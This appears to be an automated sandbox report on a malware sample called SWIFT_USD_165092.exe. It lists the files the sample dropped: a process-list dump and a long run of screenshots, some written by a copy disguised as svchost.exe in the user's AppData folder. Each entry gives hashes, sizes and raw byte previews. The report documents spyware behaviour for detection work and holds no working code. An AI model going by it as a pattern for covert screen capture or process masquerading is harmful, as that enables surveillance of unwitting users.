                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):23281
                                                                                      Entropy (8bit):5.60616812479971
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:dj1F1H7HxHQhHONIjT0kjTmjTvLH+h6jTAk6bpQJgMsRKU/+xxpof2h6ixGrrwpN:23/3m3r3zJ
                                                                                      MD5:DA991073BB7A670255418366D47D8BE2
                                                                                      SHA1:DA28ED568153E5D7015CD03C5F4D9E91F0A945C3
                                                                                      SHA-256:5660FFD830F045E0A02DE0CC7C0C5F5216613A977224BD5073AAF80A739CF00C
                                                                                      SHA-512:F1C272FC42651F09BF32625558A7A42806B9F31E87666ECE9019D31704DA69C474761A972A632EBAA2C99000CC71750393A1BF38C6FA2BEF3D108621CBD837B3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PID: 476.Process Name: csrss.exe.Executable Path: .=================.PID: 556.Process Name: winlogon.exe.Executable Path: .=================.PID: 684.Process Name: fontdrvhost.exe.Executable Path: .=================.PID: 984.Process Name: dwm.exe.Executable Path: .=================.PID: 3004.Process Name: sihost.exe.Executable Path: c:\windows\system32\sihost.exe.=================.PID: 3024.Process Name: svchost.exe.Executable Path: c:\windows\system32\svchost.exe.=================.PID: 3064.Process Name: svchost.exe.Executable Path: c:\windows\system32\svchost.exe.=================.PID: 3224.Process Name: ctfmon.exe.Executable Path: .=================.PID: 3324.Process Name: explorer.exe.Executable Path: C:\Windows\Explorer.EXE.=================.PID: 3568.Process Name: dllhost.exe.Executable Path: C:\Windows\system32\DllHost.exe.=================.PID: 3836.Process Name: ShellExperienceHost.exe.Executable Path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-19.59.39.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.13.10.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.15.26.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.46.44.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.47.45.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.47.49.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76901
                                                                                      Entropy (8bit):7.760826898112166
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQ4hJj4vSSSSSSSSSSSSSSSSSSSSSvNYqfi2F+WwWaV+cNGKU32OlZwHY12v3B00:mnd5f3PwB+oUNlZEYovR7zENzmUkWK0Q
                                                                                      MD5:8361B7611F41BA3127C669F593CDECC2
                                                                                      SHA1:34B9006293CF11626774992911EB0906EA514FA9
                                                                                      SHA-256:804145F7E3A07C7DD406E73E18B73043548C8EC9FEBD58C330E8A81AF43CC8C7
                                                                                      SHA-512:5DB2AF8125E110011BB74B09343963B9AAC41808A7FF628498DB657B17E4EDDC3AB33262C8194915CC094568078B863B2581D99442A01B15ACA3CDB93B46DAD1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.47.51.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76136
                                                                                      Entropy (8bit):7.766515045210286
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy9AqGFSSSSSSSSSSSSSSSSSSSS4kzbNjxn0MEM+nfp6FznCUyi0iKJrL+FrwkF:gGwkzSMijhiJgkuVfCz0D3u
                                                                                      MD5:B2C6E4E2CD22D16B3A5FE68F0AE8E0BA
                                                                                      SHA1:4573AD21ED7828AA3199FD2C934357B2D7E8F391
                                                                                      SHA-256:197FAEE66A627C8D0B6EC8DAA34C645FB068C2BFF28B1D30F41D1A8373C0231B
                                                                                      SHA-512:81A8CBEE3B44366E8A314D41790F802EE8478FF34635BE18B1B45DBDB7DC571F295417A20AF09DACBF13EA0FC49475CA0E46EEFE11BAE0420D4F429D7F8BFA99
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.01.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.02.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.08.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.09.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.17.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-20.48.20.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.40.22.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
